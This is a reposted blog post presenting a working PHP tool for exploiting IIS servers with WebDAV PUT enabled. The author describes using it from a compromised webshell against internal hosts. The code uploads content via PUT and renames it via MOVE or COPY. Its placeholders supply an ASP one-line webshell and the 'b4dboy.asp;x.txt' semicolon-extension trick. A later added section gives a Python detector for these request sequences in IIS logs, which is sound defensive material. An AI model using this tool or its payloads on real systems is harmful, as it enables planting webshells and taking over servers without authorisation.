PHP

PUT Vulnerability Exploitation Tool, PHP Online Version

Author: secoff  Source: reposted  2017-03-15 09:33


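From a webshell I found several IIS servers on the internal network with PUT enabled. Because of the firewall there was no interactive environment, so in a pinch I quickly wrote a simple exploitation tool in PHP (since the webshell was PHP).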

The code is as follows:

<?php

error_reporting(0);
$des = '';
$url = 'http://192.168.8.88/b4dboy.txt';

function put($url, $shellcode) {
	$options = array(
		'http' => array(
			'method' => 'PUT',
			'content' => $shellcode,
		)
	);
	$context = @stream_context_create($options);
	return @file_get_contents($url, false, $context);
}

function exploit($url, $dest, $move = 1) {
	global $des;
	$options = array(
		'http' => array(
			'method' => ($move ? 'MOVE' : 'COPY'),
			'header' => 'Destination: '.$dest,
		)
	);
	$des = $dest;
	$context = @stream_context_create($options);
	return @file_get_contents($url, false, $context);
}

if(!empty($_POST)) {
	$url = $_POST['url'];
	$method = $_POST['method'];
	$shellcode = $_POST['exp'];
	$destination = $_POST['exp'];

	$result = '';
	if($method == '1') {
		$result = put($url, $shellcode);

	} elseif($method == '2') {
		$result = exploit($url, $destination);

	} elseif($method == '3') {
		$result = exploit($url, $destination, 0);
	}
	#debug
	#print_r($result);
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="description" content="">
	<meta name="author" content="">
	<style>td{border:1px solid #ccc;text-align:right;padding: 5px 15px;}input{width:100%;}</style>
	<script type="text/javascript">
		function selectMethod(obj) {
			var desc = document.getElementById("desc");
			var val = document.getElementById("val");
			if(obj.value == '1') {
				desc.innerHTML = 'Shellcode: ';
				val.innerHTML = '<input type="text" name="exp" placeholder="<%execute request("b4dboy")%>" />';
			} else {
				desc.innerHTML = 'Destination: ';
				val.innerHTML = '<input type="text" name="exp" placeholder="http://192.168.8.88/b4dboy.asp;x.txt" />';
			}
		}
	</script>
	<title>IIS PUT</title>
</head>

<body>
	<div style="text-align:center;padding:50px;">
		<form action="" method="post">
		<table align="center">
			<tr>
				<td>Url: </td>
				<td colspan="2" width="380px;">
					<input id="url" type="text" value="<?php echo $url;?>" name="url" />
				</td>
				<td>Method: </td>
				<td width="86px;">
					<select name="method" onchange="selectMethod(this)">
						<option value="1">PUT</option>
						<option value="2">MOVE</option>
						<option value="3">COPY</option>
					</select>
				</td>
			</tr>
			<tr>
				<td id="desc">Shellcode:</td>
				<td colspan="3" id="val">
					<input type='text' name='exp' placeholder='<%execute request("b4dboy")%>' />
				</td>
				<td>
					<input type="submit" value="Submit" />
				</td>
			</tr>
			<tr>
				<td>Result: </td>
				<td colspan="4" style="text-align:center;"><?php echo $des;?></td>
			</tr>
		</table>
		</form>
	</div>
</body>
</html>
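
From the defender's side, the tool's PUT followed by MOVE or COPY on the same resource leaves a recognisable sequence in the IIS access log, as does a later request to a name such as `b4dboy.asp;x.txt`. The following Python check is an added example, not part of the original post: it correlates on client address and URI because the `Destination` header is assumed not to be logged. The log lines, client addresses and the list of script extensions are constructed assumptions.

```python
import re

# Constructed sample in IIS W3C extended format (not real traffic).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2017-03-15 09:30:01 GET /index.asp 192.168.8.20 200
2017-03-15 09:31:12 PUT /b4dboy.txt 192.168.8.66 201
2017-03-15 09:31:15 MOVE /b4dboy.txt 192.168.8.66 201
2017-03-15 09:31:20 POST /b4dboy.asp;x.txt 192.168.8.66 200
2017-03-15 09:40:00 PUT /docs/report.txt 192.168.8.30 403
"""

WRITE_METHODS = {"MOVE", "COPY"}
# Assumption: extensions mapped to a script handler on the server; adjust per site.
SCRIPT_SEMICOLON = re.compile(r"\.(asp|asa|cer|cdx);", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def find_put_chains(text):
    """Return alerts for PUT->MOVE/COPY chains and script-extension;suffix URIs."""
    uploaded = set()  # (client ip, uri) pairs created by a successful PUT
    alerts = []
    for r in parse_w3c(text):
        key = (r["c-ip"], r["cs-uri-stem"].lower())
        ok = r["sc-status"].startswith("2")
        when = r["date"] + " " + r["time"]
        if r["cs-method"] == "PUT" and ok:
            uploaded.add(key)
        elif r["cs-method"] in WRITE_METHODS and ok and key in uploaded:
            alerts.append((when, r["c-ip"], "put-then-" + r["cs-method"].lower(), r["cs-uri-stem"]))
        if SCRIPT_SEMICOLON.search(r["cs-uri-stem"]):
            alerts.append((when, r["c-ip"], "script-ext-semicolon", r["cs-uri-stem"]))
    return alerts


if __name__ == "__main__":
    for alert in find_put_chains(SAMPLE_LOG):
        print(*alert)
```

Any alert from this check is also a prompt to review whether WebDAV and write permission need to be enabled on that site at all.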

This article comes from: 蜗蜗侠's Blog - Focus on Network Security http://blog.icxun.cn/Php/615.html
